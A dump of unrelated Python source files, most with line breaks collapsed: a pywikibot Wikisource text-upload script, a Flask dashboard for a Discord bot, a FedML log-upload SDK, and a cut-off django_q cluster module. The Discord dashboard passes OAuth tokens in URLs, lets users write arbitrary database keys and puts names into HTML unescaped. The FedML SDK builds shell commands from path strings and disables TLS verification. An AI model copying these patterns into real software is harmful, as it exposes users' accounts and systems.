This bot applies to wikisource sites to upload text.

Text is uploaded to pages in the Page namespace, for a specified Index.
Text to be stored, if the page does not exist, is preloaded from the file used
to create the Index page, making the upload feature independent from the format
of the file, as long as it is supported by the MW ProofreadPage extension.

As an alternative, if the '-ocr' option is selected, the
https://tools.wmflabs.org/phetools OCR tool will be used to get text.
In this case, already existing pages with quality value 'Not Proofread'
can also be treated. '-force' will override the existing page in this case.

TODO: update params + handle quality level

The following parameters are supported:

    -index:...  name of the index page.

    -pages:<start>-<end>,...<start>-<end>,<start>-<end>
                Page range to upload; optional, start=1, end=djvu file number
                of images.
                Page ranges can be specified as:

                | A-B -> pages A until B
                | A-  -> pages A until number of images
                | A   -> just page A
                | -B  -> pages 1 until B

    -showdiff:  show difference between current text and new text when
                saving the page.

    -ocr:       use OCR tools hosted on https://tools.wmflabs.org.
                By default no OCR is done, i.e. only not-(yet)-existing
                pages in the Page namespace will be treated and text will be
                fetched via preload.
                If -ocr is provided, the default OCR method is:
                 - https://tools.wmflabs.org/phetools
                If ocr:googleOCR is given, the OCR method is:
                 - https://tools.wmflabs.org/ws-google-ocr

    -threads:n  number of threads used to fetch OCR from OCR tools.
                default is 5; valid only if '-ocr' is selected.

    -force:     overwrite existing pages; default is False; valid only if
                '-ocr' is selected.

    -summary:   custom edit summary. Use quotes if the edit summary contains
                spaces.

    -always     don't bother asking to confirm any of the changes.
"""
#
# (C) Pywikibot team, 2016-2019
#
# Distributed under the terms of the MIT license.
# from __future__ import absolute_import, division, unicode_literals import collections import itertools import threading import time import pywikibot from pywikibot import i18n from pywikibot.bot import SingleSiteBot from pywikibot.proofreadpage import IndexPage, ProofreadPage from pywikibot.tools import PY2 if not PY2: import queue else: import Queue as queue # noqa: N813 class UploadTextBot(SingleSiteBot): """ A bot that uploads text-layer to Page:namespace. Text is fetched via preload as on Wikisource wikis, text can be preloaded only if a page does not exist, if an Index page is present. Works only on sites with Proofread Page extension installed. """ def __init__(self, generator, **kwargs): """ Initializer. If OCR is requested, spawns worker threads, and, if no "force" option is set, filter for existing pages. Queues are used for communication to/from threads. A PriorityQueue is used to process pages in the same order as they are generated. @param generator: page generator @type generator: generator """ self.availableOptions.update({ 'showdiff': False, 'force': False, 'ocr': False, 'summary': 'Bot: uploading text', 'threads': 5 }) super(UploadTextBot, self).__init__(**kwargs) self.generator = generator # TODO: create i18 files # Get edit summary message if it's empty. if not self.getOption('summary'): self.options['summary'] = i18n.twtranslate(self.site, 'djvutext-creating') if self.getOption('ocr'): self._num_threads = self.getOption('threads') self._queue_in = queue.Queue() self._queue_out = queue.PriorityQueue() # If not "-force", no reason to get OCR for existing pages # and to process them in Bot.run(). 
if not self.getOption('force'): self.generator = (p for p in self.generator if not p.exists()) self._spawn_ocr_threads() def _spawn_ocr_threads(self): """Spawn threads for _ocr_worker workers.""" for i in range(self._num_threads): worker = threading.Thread(target=self._ocr_worker) worker.setDaemon(True) worker.start() self._pages = collections.OrderedDict() for idx, p in enumerate(self.generator): self._pages.setdefault(p, idx) self.generator = (p for p in self._pages) # recreate gen for run() for p, idx in self._pages.items(): self._queue_in.put((p, idx)) # idx to preserve order later def _ocr_worker(self): """Fetch OCR content from ocr_tool and queue it.""" while True: page, idx = self._queue_in.get() try: text_body = page.ocr(ocr_tool=self.getOption('ocr')) except ValueError as e: # TODO: is it a problem in PY2? pywikibot.error(str(e)) text_body = None # Sentinel: signal exception to self.treat() self._queue_out.put((idx, text_body)) self._queue_in.task_done() def _get_ocr(self, page): """Get OCR content for page from PriorityQueue.""" # blocks until OCR for expected idx is available expected_idx = self._pages.get(page) while True: if self._queue_out.empty(): time.sleep(0.2) # some pause continue idx, text_body = self._queue_out.queue[0] # peek first element if idx == expected_idx: idx, text_body = self._queue_out.get() return text_body def treat(self, page): """Process one ProofreadPage page. @param page: page to be treated. @type page: ProofreadPage @raises: pywikibot.Error """ if not isinstance(page, ProofreadPage): raise pywikibot.Error('Page {} must be a ProofreadPage object.' .format(page)) summary = self.getOption('summary') if page.exists(): old_text = page.text else: old_text = '' if self.getOption('ocr'): _body = self._get_ocr(page) if _body is None: pywikibot.output('No OCR found. 
Skipping {}' .format(page.title(as_link=True))) return page.body = _body if (page.exists() and not (self.getOption('ocr') and self.getOption('force'))): pywikibot.output('Page {} already exists, not adding!' .format(page)) else: self.userPut(page, old_text, page.text, summary=summary, show_diff=self.getOption('showdiff')) def main(*args): """ Process command line arguments and invoke bot. If args is an empty list, sys.argv is used. @param args: command line arguments @type args: str """ index = None pages = '1-' options = {} # Parse command line arguments. local_args = pywikibot.handle_args(args) for arg in local_args: arg, sep, value = arg.partition(':') if arg == '-index': index = value elif arg == '-pages': pages = value elif arg == '-showdiff': options['showdiff'] = True elif arg == '-summary': options['summary'] = value elif arg == '-ocr': options['ocr'] = value or 'phetools' elif arg == '-threads': options['threads'] = int(value) elif arg == '-force': options['force'] = True elif arg == '-always': options['always'] = True else: pywikibot.output('Unknown argument ' + arg) # index is mandatory. if not index: pywikibot.bot.suggest_help(missing_parameters=['-index']) return # '-force' can be used with '-ocr' only. if 'force' in options and 'ocr' not in options: pywikibot.error("'-force' can be used with '-ocr' option only.") return site = pywikibot.Site() if not site.has_extension('ProofreadPage'): pywikibot.error('Site {} must have ProofreadPage extension.' .format(site)) return index = IndexPage(site, index) if not index.exists(): pywikibot.error("Page {} doesn't exist.".format(index)) return # Parse pages param. # Create a list of (start, end) tuples. pages = pages.split(',') for interval in range(len(pages)): start, sep, end = pages[interval].partition('-') start = 1 if not start else int(start) if not sep: end = start else: end = int(end) if end else index.num_pages pages[interval] = (start, end) # gen yields ProofreadPage objects. 
gen_list = [] for start, end in sorted(pages): gen = index.page_gen(start=start, end=end, filter_ql=[1], content=True) gen_list.append(gen) gen = itertools.chain(*gen_list) pywikibot.output('\nUploading text to {}\n' .format(index.title(as_link=True))) bot = UploadTextBot(gen, site=index.site, **options) bot.run() if __name__ == '__main__': try: main() except Exception: pywikibot.error('Fatal error:', exc_info=True)
# ---- server.py ----
from flask import Flask from threading import Thread from flask import send_file, send_from_directory, safe_join, abort, g, session, redirect, request, url_for, jsonify, render_template import os import random import requests import json import string app = Flask('') import discord from replit import db import logging log = logging.getLogger('werkzeug') log.setLevel(logging.ERROR) client = None def setClient(bot): global client client = bot def get_random_string(length): letters = string.ascii_letters result_str = ''.join(random.choice(letters) for i in range(length)) return result_str @app.route('/') def main(): style = render_template('style.css') homePage = render_template('home.html') return homePage.format(style=style, bs='{', bl='}') @app.route('/invite') def invite(): #https://discord.com/oauth2/authorize?client_id=734526487994171392&permissions=8&scope=bot return """<meta http-equiv="Refresh" content="0; url='https://discord.com/oauth2/authorize?client_id=734526487994171392&permissions=8&scope=bot'" />""" @app.route('/loadstaff') def loadStaff(): javascript = render_template('loadStaff.js') style = render_template('style.css') homePage = render_template('load.html') return homePage.format(style=style, javascript=javascript) @app.route('/fetchuser') def fetchuser(): user = request.args.get('id') if user == None: return 'null' person = client.get_user(int(user)) userDict = {"tag": str(person), "pfp": str(person.avatar_url)} from flask import jsonify return str(userDict) @app.route('/staff') def staffPage(): staff = ["368071242189897728", "373863238816759819", "549268263289487431", "703282236279226408", "741554642063982692"] #^ coolo2, holy cat, kemosaf, chopstix, and UpbeatErmine493 token = request.args.get('token') key = request.args.get('key') value = request.args.get('value') if token == None or token == 'null': return """<meta http-equiv="Refresh" content="0; 
url='https://discord.com/api/oauth2/authorize?client_id=776729260647907379&redirect_uri=https%3A%2F%2Fdonut.js.org%2Floadstaff&response_type=token&scope=identify%20guilds&prompt=none'" />""" else: person = requests.get('https://discord.com/api/users/@me', headers={"Authorization" : f"Bearer {token}"}) if person.status_code == 401: return """<meta http-equiv="Refresh" content="0; url='https://discord.com/api/oauth2/authorize?client_id=776729260647907379&redirect_uri=https%3A%2F%2Fdonut.js.org%2Floadstaff&response_type=token&scope=identify%20guilds'" />""" person = json.loads(person.text) id = person['id'] if id in staff: ##^the firewall^## if(key != None and value != None): if(key == 'blacklists'): blacklists = db['blacklists'] if value in blacklists: blacklists.remove(value) else: blacklists.append(value) db[f'blacklists'] = blacklists return 'data entered the database successfully and firewall allowed access' else: db[f'{key}'] = value if person['avatar'] == None: userAv = 'https://www.attornify.com/assets/builds/images/no_avatar.jpg' else: userAv = f"https://cdn.discordapp.com/avatars/{person['id']}/{person['avatar']}.webp?size=4096" allServers = '' for element in client.guilds: if element.icon_url == None: serverAv = 'https://intersections.humanities.ufl.edu/wp-content/uploads/2020/07/112815904-stock-vector-no-image-available-icon-flat-vector-illustration-1.jpg' else: serverAv = element.icon_url server = client.get_guild(int(element.id)) code = get_random_string(6) db[f"dashboard_{element.id}_{person['id']}"] = code allServers += f""" <div class="item"> <div class="float"> <img width=100%; src='{serverAv}'><br> <p style='font-size:15px'><b>{element.name}</b></p><p style='font-size:10px'>ID: {element.id}</p><a href='/render#server={element.id}&user={person['id']}&tag={person['username']}%23{person['discriminator']}&code={code}&token={token}&type=staff'><p><button style='cursor: pointer; background-color:#ff4085'>View Dashboard</button></p></a> </div> </div> """ 
style = render_template('style.css') staffWeb = render_template('staff.html') return staffWeb.format(style=style, userAv=userAv, userusername=person['username'], userdiscriminator=person['discriminator'], allServers=allServers, bs='{', bl='}', suggestions=db['suggestions'], issues=db['issues'], token=token, blacklists=db['blacklists']) else: page = render_template('notStaff.html') style = render_template('style.css') return page.format(style=style) return "You aren't part of the staff team! " @app.route('/dashboard') def dashboard(): return """<meta http-equiv="Refresh" content="0; url='https://discord.com/oauth2/authorize?client_id=776729260647907379&redirect_uri=https%3A%2F%2Fdonut.js.org%2Fload&response_type=token&scope=identify%20guilds&prompt=none'" />""" @app.route('/levels') def levels(): users = db.prefix(f"level_") userArray = [] levels = '' i = 0 if len(users) > 0: for element in users: userLvl = db[element] userID = element.replace(f"level_", "") userArray.append({"user": f'{userID}', "lvl": userLvl}) def get_my_key(obj): return obj['lvl'] userArray.sort(key=get_my_key) userArray.reverse() for element in userArray: person = client.get_user(int(element["user"])) i += 1 xp = element['lvl'] nextInt = int(xp/1000+1) * 1000 leftNext = nextInt - xp thisLevelXp = 1000 - leftNext if(client.get_user(int(element['user'])) != None): person = client.get_user(int(element['user'])).name + '%23____' member = client.get_user(int(element['user'])) try: xpcolor = db[f'cardXp_{element["user"]}'] except: xpcolor = 'ff4085' try: bgcolor = db[f'cardBg_{element["user"]}'] except: bgcolor = None levels += f''' <center> <img width=800 src='https://vacefron.nl/api/rankcard?username={person}&avatar={client.get_user(int(element['user'])).avatar_url}&level={int(xp/1000)}+++++++++++++Rank+{i}&rank=&currentxp={thisLevelXp}&nextlevelxp=1000&previouslevelxp=0&custombg={bgcolor}&xpcolor={xpcolor}&isboosting=false'> </center> <br><br><br><br> ''' page = render_template('levels.html') 
style = render_template('style.css') return page.format(style=style, levels=levels) @app.route('/server') def dashboardPage(): req = request.args.get('type') user = request.args.get('user') server = request.args.get('server') code = request.args.get('code') token = request.args.get('token') key = request.args.get('key') value = request.args.get('value') try: dbCode = db[f"dashboard_{server}_{user}"] except: dbCode = os.getenv("PASSWORD") try: prefix = db[f"prefix_{server}"] except: prefix = '?' try: currency = db[f"currency_{server}"] except: currency = 'coins' try: defaultColor = str(db[f"color_{server}"].replace('0x', '#')) except: defaultColor = '#ff4085' try: deleteID = db[f"deleteChannel_{server}"] deleteChannel = client.get_channel(int(deleteID)); check = 'checked' except: deleteChannel = 'None' deleteID = 'None' check = '' try: editID = db[f"editChannel_{server}"] editChannel = client.get_channel(int(editID)); check = 'checked' except: editChannel = 'None' editID = 'None' check = '' try: leaveID = db[f"leaveChannel_{server}"] leaveChannel = client.get_channel(int(leaveID)); check = 'checked' except: leaveChannel = 'None' leaveID = 'None' check = '' try: leaveMessage = db[f"leaveMessage_{server}"] except: leaveMessage = 'None' try: joinID = db[f"joinChannel_{server}"] joinChannel = client.get_channel(int(joinID)); check = 'checked' except: joinChannel = 'None' joinID = 'None' check = '' try: joinMessage = db[f"joinMessage_{server}"] except: joinMessage = 'None' if str(code) == str(dbCode): if key != None and value != None: db[f"{key}_{server}"] = str(value) bs = '{' bl = '}' guildObj = client.get_guild(int(server)) if guildObj.icon == None: serverAv = 'https://intersections.humanities.ufl.edu/wp-content/uploads/2020/07/112815904-stock-vector-no-image-available-icon-flat-vector-illustration-1.jpg' else: serverAv = f'https://cdn.discordapp.com/icons/{server}/{guildObj.icon}.webp?size=4096' channels = '' for element in guildObj.channels: if str(element.type) == 
'text' or str(element.type) == 'news': channels += f'<option value="{element.id}">#{element.name}</option>\n' if req == 'staff': nav = """ <a href="/">Home</a> <a href="/dashboard">Dashboard</a> <a href="/levels">Levels</a> <a href="/commands">Commands</a> <a style='background-color:white;' href="/staff">Staff</a> <a href="/about">About</a> """ redirect = 'loadstaff' else: nav = """ <a href="/">Home</a> <a style='background-color:white;' href="/dashboard">Dashboard</a> <a href="/levels">Levels</a> <a href="/commands">Commands</a> <a href="/staff">Staff</a> <a href="/about">About</a> """ redirect = 'load' style = render_template('style.css') html = render_template('server.html') return html.format(style=style, defaultColor=defaultColor, channels=channels, bs='{', bl='}', serverAv=serverAv, joinChannel=joinChannel, joinID=joinID, joinMessage=joinMessage, leaveChannel=leaveChannel, leaveID=leaveID, leaveMessage=leaveMessage, editChannel=editChannel, editID=editID, deleteChannel=deleteChannel, deleteID=deleteID, prefix=prefix, token=token, guildObj=guildObj, lenguildObjmembers=len(guildObj.members), guildBirthday=guildObj.created_at.strftime('%a, %#d, %B, %Y, %I :%M %p UTC'), server=server, user=user, code=code, nav=nav, redirect=redirect, currency=currency) else: return "fail" @app.route('/test') def test(): token = request.args.get('token') user = requests.get('https://discord.com/api/users/@me', headers={"Authorization" : f"Bearer {token}"}) return str(user.status_code) @app.route('/profile') def profile(): guildList = '' noDonut = '' noPerms = '' name = request.args.get('name') value = request.args.get('value') token = request.args.get('token') user = requests.get('https://discord.com/api/users/@me', headers={"Authorization" : f"Bearer {token}"}) if user.status_code == 401: return """<meta http-equiv="Refresh" content="0; 
url='https://discord.com/api/oauth2/authorize?client_id=776729260647907379&redirect_uri=https%3A%2F%2Fdonut.js.org%2Fload&response_type=token&scope=identify%20guilds'" />""" user = json.loads(user.text) guilds = requests.get('https://discord.com/api/users/@me/guilds', headers={"Authorization" : f"Bearer {token}"}) guilds = guilds.json() try: xp = db[f"level_{user['id']}"] except: xp = 0 nextInt = int(xp/1000+1) * 1000; leftNext = nextInt - xp; thisLevelXp = 1000 - leftNext if token == None or token == 'null': return """<meta http-equiv="Refresh" content="0; url='https://discord.com/api/oauth2/authorize?client_id=776729260647907379&redirect_uri=https%3A%2F%2Fdonut.js.org%2Fload&response_type=token&scope=identify%20guilds'" />""" if name != None and value != None: db[f'{name}_{user["id"]}'] = value return "Set!" try: xpcolor = db[f'cardXp_{user["id"]}'] except: xpcolor = 'ff4085' try: bgcolor = db[f'cardBg_{user["id"]}'] except: bgcolor = None for element in guilds: try: guildObj = client.get_guild(int(element['id'])) except: guildObj = None perms = str(element['permissions']) perms = [char for char in perms] if len(perms) > 9: perms = perms[9] else: perms = None if guildObj != None and perms == '7': #7 indicated that the user has admin in that server sikk #if guildObj is basically checking that the bot is in the guild and it rtuerned something not None code = get_random_string(6) db[f"dashboard_{element['id']}_{user['id']}"] = code if element['icon'] == None: serverAv = 'https://intersections.humanities.ufl.edu/wp-content/uploads/2020/07/112815904-stock-vector-no-image-available-icon-flat-vector-illustration-1.jpg' else: serverAv = f'https://cdn.discordapp.com/icons/{element["id"]}/{element["icon"]}.webp?size=4096' guildList = guildList + f""" <div class="item"> <div class="float"> <img width=100%; src='{serverAv}'><br> <p style='font-size:15px'><b>{element['name']}</b></p><a 
href='/render#server={element['id']}&user={user['id']}&tag={user['username']}%23{user['discriminator']}&code={code}&token={token}&type=user'><p><button style='cursor: pointer; background-color:#ff4085'>View Dashboard</button></p></a> </div> </div> """ if guildObj == None and perms == '7': if element['icon'] == None: serverAv = 'https://intersections.humanities.ufl.edu/wp-content/uploads/2020/07/112815904-stock-vector-no-image-available-icon-flat-vector-illustration-1.jpg' else: serverAv = f'https://cdn.discordapp.com/icons/{element["id"]}/{element["icon"]}.webp?size=4096' noDonut = noDonut + f""" <div class="item"> <div class="float"> <img width=100%; src='{serverAv}'><br> <p style='font-size:15px'><b>{element['name']}</b></p><a href='https://discord.com/api/oauth2/authorize?client_id=734526487994171392&permissions=8&scope=bot&guild_id={element['id']}'><p><button style='background-color:gray; cursor: pointer;'>Invite Me</button></p></a> </div> </div> """ if guildObj != None and perms != '7': if element['icon'] == None: serverAv = 'https://intersections.humanities.ufl.edu/wp-content/uploads/2020/07/112815904-stock-vector-no-image-available-icon-flat-vector-illustration-1.jpg' else: serverAv = f'https://cdn.discordapp.com/icons/{element["id"]}/{element["icon"]}.webp?size=4096' noPerms = noPerms + f""" <div class="item"> <div class="float"> <img width=100%; src='{serverAv}'><br> <p style='font-size:15px'><b>{element['name']}</b></p><a><p><button style='background-color:red; cursor: no-drop;'>No Permissions</button></p></a> </div> </div> """ if user['avatar'] == None: userAv = 'https://www.attornify.com/assets/builds/images/no_avatar.jpg' else: userAv = f"https://cdn.discordapp.com/avatars/{user['id']}/{user['avatar']}.webp?size=4096" style = render_template('style.css') profilePage = render_template('profile.html') #f"https://vacefron.nl/api/rankcard?username={str(member).replace('#', 
'%23')}&avatar={member.avatar_url}&level={int(xp/100)}&rank=&currentxp={thisLevelXp}&nextlevelxp=1000&previouslevelxp=0&custombg=none&xpcolor=ff4085&isboosting=false" return profilePage.format(style=style, userAv=userAv, userusername=user['username'], userdiscriminator=user['discriminator'], userlocale=user['locale'], userid=user['id'], guildList=guildList, noPerms=noPerms, noDonut=noDonut, bs='{', bl='}', levelTag=f"{user['username']}%23{user['discriminator']}", level=int(xp/1000), thisLevelXp=thisLevelXp, token=token, xpcolor=xpcolor, bgcolor=bgcolor) @app.route('/render') def render(): javascript = render_template('guildrender.js') style = render_template('style.css') page = render_template('load.html') return page.format(style=style, javascript=javascript) @app.route('/load') def load(): javascript = render_template('render.js') style = render_template('style.css') homePage = render_template('load.html') return homePage.format(style=style, javascript=javascript) @app.route('/about') def about(): style = render_template('style.css') page = render_template('about.html') return page.format(style=style) @app.route('/commands') def commands(): style = render_template('style.css') page = render_template('commands.html') return page.format(style=style) @app.errorhandler(404) def page_not_found(e): notFound = render_template('notFound.html') style = render_template('style.css') return notFound.format(style=style) def run(): app.run(host="0.0.0.0", port=8080) def online(client): server = Thread(target=run) server.start() #oauth2 link: https://discord.com/api/oauth2/authorize?client_id=776729260647907379&redirect_uri=https%3A%2F%2Fdonut.js.org%2Fload&response_type=token&scope=identify%20guilds
# ---- FedLogsSDK.py ----
import logging import multiprocessing import os import sys import json import threading import time import requests import yaml sys.path.insert(0, os.path.abspath(os.path.join(os.getcwd(), "../../../"))) sys.path.insert(0, os.path.abspath(os.path.join(os.getcwd(), "../../../../FedML"))) class FedLogsSDK: FED_LOG_LINE_NUMS_PER_UPLOADING = 100 _log_sdk_instance = None _instance_lock = threading.Lock() def __new__(cls, *args, **kwargs): if not hasattr(FedLogsSDK, "_instance"): with FedLogsSDK._instance_lock: if not hasattr(FedLogsSDK, "_instance"): FedLogsSDK._instance = object.__new__(cls) return FedLogsSDK._instance def __init__(self, args): self.args = args self.should_write_log_file = True self.should_upload_log_file = True self.log_file_dir = args.log_file_dir self.log_file = None self.run_id = args.run_id if args.silo_rank == 0: self.edge_id = 0 else: self.edge_id = json.loads(args.client_ids)[0] if args.log_server_url is None or args.log_server_url == "": self.log_server_url ="https://open.fedml.ai/fedmlOpsServer/logs/update" else: self.log_server_url = args.log_server_url self.log_line_index = 0 self.log_config_file = args.log_file_dir + "/log-config.yaml" self.log_config = {} self.load_log_config() self.origin_log_file_path = self.log_file_dir + "/fedavg-cross-silo-run-" + str(self.run_id) + \ "-edge-" + str(self.edge_id) + ".log" self.log_file_path = self.log_file_dir + "/fedavg-cross-silo-run-" + str(self.run_id) + \ "-edge-" + str(self.edge_id) + "-upload.log" if self.should_upload_log_file: multiprocessing.Process(target=self.log_thread).start() @staticmethod def get_instance(args): if FedLogsSDK._log_sdk_instance is None: FedLogsSDK._log_sdk_instance = FedLogsSDK(args) return FedLogsSDK._log_sdk_instance def init_logs(self): log_file_path, program_prefix = FedLogsSDK.build_log_file_path(self.args) if self.should_write_log_file: logging.basicConfig( filename=log_file_path, filemode="w", level=logging.INFO, format=program_prefix + " - %(asctime)s 
%(filename)s[line:%(lineno)d] %(levelname)s %(message)s", datefmt="%a, %d %b %Y %H:%M:%S", ) else: logging.basicConfig( level=logging.INFO, format=program_prefix + " - %(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s", datefmt="%a, %d %b %Y %H:%M:%S", ) @staticmethod def build_log_file_path(args): if args.silo_rank == 0: edge_id = 0 program_prefix = "FedML-Server({}) @device-id-{}".format(args.silo_rank, edge_id) else: edge_id = json.loads(args.client_ids)[0] program_prefix = "FedML-Client({rank}) @device-id-{edge}".format(rank=args.silo_rank, edge=edge_id) os.system("mkdir -p " + args.log_file_dir) client_ids = json.loads(args.client_ids) log_file_path = args.log_file_dir + "/fedavg-cross-silo-run-" + str(args.run_id) + \ "-edge-" + str(edge_id) + ".log" return log_file_path, program_prefix def log_upload(self, run_id, edge_id): # read log data from local log file log_lines = self.log_read() if log_lines is None or len(log_lines) <= 0: return self.log_line_index += len(log_lines) log_upload_request = {"run_id": run_id, "edge_id": edge_id, "logs": log_lines, "create_time": time.time(), "update_time": time.time(), "created_by": str(edge_id), "updated_by": str(edge_id)} # set request header with the application/json format log_headers = {'Content-Type': 'application/json'} # send log data to the log server response = requests.post(self.log_server_url, headers=log_headers, json=log_upload_request, verify=False) if response.status_code != 200: # print('Error for sending log data: ' + str(response.status_code)) self.log_line_index -= len(log_lines) else: resp_data = response.json() # print('The result for sending log data: code %s, content %s' % # (str(response.status_code), str(resp_data))) def log_thread(self): while True: time.sleep(10) self.log_upload(self.run_id, self.edge_id) def log_relocation(self): log_line_count = self.log_line_index while log_line_count > 0: self.log_file.readline() log_line_count -= 1 def log_open(self): try: os.system("cp 
-f " + self.origin_log_file_path + " " + self.log_file_path) if self.log_file is None: self.log_file = open(self.log_file_path, "r") self.log_relocation() except Exception as e: # print("exception at open log file.") pass def log_read(self): self.log_open() if self.log_file is None: return None line_count = 0 log_lines = [] while True: line_count += 1 log_line = self.log_file.readline() if not log_line: break log_lines.append(log_line) self.log_file.close() self.log_file = None return log_lines @staticmethod def __generate_yaml_doc(log_config_object, yaml_file): try: file = open(yaml_file, 'w', encoding='utf-8') yaml.dump(log_config_object, file) file.close() except Exception as e: # print("Generate yaml file.") pass @staticmethod def __load_yaml_config(yaml_path): """Helper function to load a yaml config file""" with open(yaml_path, "r") as stream: try: return yaml.safe_load(stream) except yaml.YAMLError as exc: raise ValueError("Yaml error - check yaml file") def load_log_config(self): try: self.log_config = self.__load_yaml_config(self.log_config_file) self.log_line_index = self.log_config["log_config"]["log_line_index"] except Exception as e: # print("load_log_config exception") pass
# ---- cluster.py ----
# Standard import ast import inspect import pydoc import signal import socket import traceback import uuid from datetime import datetime from multiprocessing import Event, Process, Value, current_process from time import sleep # External import arrow # Django from django import core, db from django.apps.registry import apps try: apps.check_apps_ready() except core.exceptions.AppRegistryNotReady: import django django.setup() from django.conf import settings from django.utils import timezone from django.utils.translation import gettext_lazy as _ # Local import django_q.tasks from django_q.brokers import Broker, get_broker from django_q.conf import ( Conf, croniter, error_reporter, get_ppid, logger, psutil, resource, ) from django_q.humanhash import humanize from django_q.models import Schedule, Success, Task from django_q.queues import Queue from django_q.signals import post_execute, pre_execute from django_q.signing import BadSignature, SignedPackage from django_q.status import Stat, Status class Cluster: def __init__(self, broker: Broker = None): self.broker = broker or get_broker() self.sentinel = None self.stop_event = None self.start_event = None self.pid = current_process().pid self.cluster_id = uuid.uuid4() self.host = socket.gethostname() self.timeout = Conf.TIMEOUT signal.signal(signal.SIGTERM, self.sig_handler) signal.signal(signal.SIGINT, self.sig_handler) def start(self) -> int: # Start Sentinel self.stop_event = Event() self.start_event = Event() self.sentinel = Process( target=Sentinel, args=( self.stop_event, self.start_event, self.cluster_id, self.broker, self.timeout, ), ) self.sentinel.start() logger.info(_(f"Q Cluster {self.name} starting.")) while not self.start_event.is_set(): sleep(0.1) return self.pid def stop(self) -> bool: if not self.sentinel.is_alive(): return False logger.info(_(f"Q Cluster {self.name} stopping.")) self.stop_event.set() self.sentinel.join() logger.info(_(f"Q Cluster {self.name} has stopped.")) self.start_event = None 
self.stop_event = None return True def sig_handler(self, signum, frame): logger.debug( _( f'{current_process().name} got signal {Conf.SIGNAL_NAMES.get(signum, "UNKNOWN")}' ) ) self.stop() @property def stat(self) -> Status: if self.sentinel: return Stat.get(pid=self.pid, cluster_id=self.cluster_id) return Status(pid=self.pid, cluster_id=self.cluster_id) @property def name(self) -> str: return humanize(self.cluster_id.hex) @property def is_starting(self) -> bool: return self.stop_event and self.start_event and not self.start_event.is_set() @property def is_running(self) -> bool: return self.stop_event and self.start_event and self.start_event.is_set() @property def is_stopping(self) -> bool: return ( self.stop_event and self.start_event and self.start_event.is_set() and self.stop_event.is_set() ) @property def has_stopped(self) -> bool: return self.start_event is None and self.stop_event is None and self.sentinel class Sentinel: def __init__( self, stop_event, start_event, cluster_id, broker=None, timeout=Conf.TIMEOUT, start=True, ): # Make sure we catch signals for the pool signal.signal(signal.SIGINT, signal.SIG_IGN) signal.signal(signal.SIGTERM, signal.SIG_DFL) self.pid = current_process().pid self.cluster_id = cluster_id self.parent_pid = get_ppid() self.name = current_process().name self.broker = broker or get_broker() self.reincarnations = 0 self.tob = timezone.now() self.stop_event = stop_event self.start_event = start_event self.pool_size = Conf.WORKERS self.pool = [] self.timeout = timeout self.task_queue = ( Queue(maxsize=Conf.QUEUE_LIMIT) if Conf.QUEUE_LIMIT else Queue() ) self.result_queue = Queue() self.event_out = Event() self.monitor = None self.pusher = None if start: self.start() def start(self): self.broker.ping() self.spawn_cluster() self.guard() def status(self) -> str: if not self.start_event.is_set() and not self.stop_event.is_set(): return Conf.STARTING elif self.start_event.is_set() and not self.stop_event.is_set(): if 
self.result_queue.empty() and self.task_queue.empty(): return Conf.IDLE return Conf.WORKING elif self.stop_event.is_set() and self.start_event.is_set(): if self.monitor.is_alive() or self.pusher.is_alive() or len(self.pool) > 0: return Conf.STOPPING return Conf.STOPPED def spawn_process(self, target, *args) -> Process: """ :type target: function or class """ p = Process(target=target, args=args) p.daemon = True if target == worker: p.daemon = Conf.DAEMONIZE_WORKERS p.timer = args[2] self.pool.append(p) p.start() return p def spawn_pusher(self) -> Process: return self.spawn_process(pusher, self.task_queue, self.event_out, self.broker) def spawn_worker(self): self.spawn_process( worker, self.task_queue, self.result_queue, Value("f", -1), self.timeout ) def spawn_monitor(self) -> Process: return self.spawn_process(monitor, self.result_queue, self.broker) def reincarnate(self, process): """ :param process: the process to reincarnate :type process: Process or None """ if not Conf.SYNC: db.connections.close_all() # Close any old connections if process == self.monitor: self.monitor = self.spawn_monitor() logger.error(_(f"reincarnated monitor {process.name} after sudden death")) elif process == self.pusher: self.pusher = self.spawn_pusher() logger.error(_(f"reincarnated pusher {process.name} after sudden death")) else: self.pool.remove(process) self.spawn_worker() if process.timer.value == 0: # only need to terminate on timeout, otherwise we risk destabilizing the queues process.terminate() logger.warning(_(f"reincarnated worker {process.name} after timeout")) elif int(process.timer.value) == -2: logger.info(_(f"recycled worker {process.name}")) else: logger.error(_(f"reincarnated worker {process.name} after death")) self.reincarnations += 1 def spawn_cluster(self): self.pool = [] Stat(self).save() if not Conf.SYNC: db.connection.close() # spawn worker pool for __ in range(self.pool_size): self.spawn_worker() # spawn auxiliary self.monitor = self.spawn_monitor() 
self.pusher = self.spawn_pusher() # set worker cpu affinity if needed if psutil and Conf.CPU_AFFINITY: set_cpu_affinity(Conf.CPU_AFFINITY, [w.pid for w in self.pool]) def guard(self): logger.info( _( f"{current_process().name} guarding cluster {humanize(self.cluster_id.hex)}" ) ) self.start_event.set() Stat(self).save() logger.info(_(f"Q Cluster {humanize(self.cluster_id.hex)} running.")) counter = 0 cycle = Conf.GUARD_CYCLE # guard loop sleep in seconds # Guard loop. Runs at least once while not self.stop_event.is_set() or not counter: # Check Workers for p in self.pool: with p.timer.get_lock(): # Are you alive? if not p.is_alive() or p.timer.value == 0: self.reincarnate(p) continue # Decrement timer if work is being done if p.timer.value > 0: p.timer.value -= cycle # Check Monitor if not self.monitor.is_alive(): self.reincarnate(self.monitor) # Check Pusher if not self.pusher.is_alive(): self.reincarnate(self.pusher) # Call scheduler once a minute (or so) counter += cycle if counter >= 30 and Conf.SCHEDULER: counter = 0 scheduler(broker=self.broker) # Save current status Stat(self).save() sleep(cycle) self.stop() def stop(self): Stat(self).save() name = current_process().name logger.info(_(f"{name} stopping cluster processes")) # Stopping pusher self.event_out.set() # Wait for it to stop while self.pusher.is_alive(): sleep(0.1) Stat(self).save() # Put poison pills in the queue for __ in range(len(self.pool)): self.task_queue.put("STOP") self.task_queue.close() # wait for the task queue to empty self.task_queue.join_thread() # Wait for all the workers to exit while len(self.pool): for p in self.pool: if not p.is_alive(): self.pool.remove(p) sleep(0.1) Stat(self).save() # Finally stop the monitor self.result_queue.put("STOP") self.result_queue.close() # Wait for the result queue to empty self.result_queue.join_thread() logger.info(_(f"{name} waiting for the monitor.")) # Wait for everything to close or time out count = 0 if not self.timeout: self.timeout = 30 while 
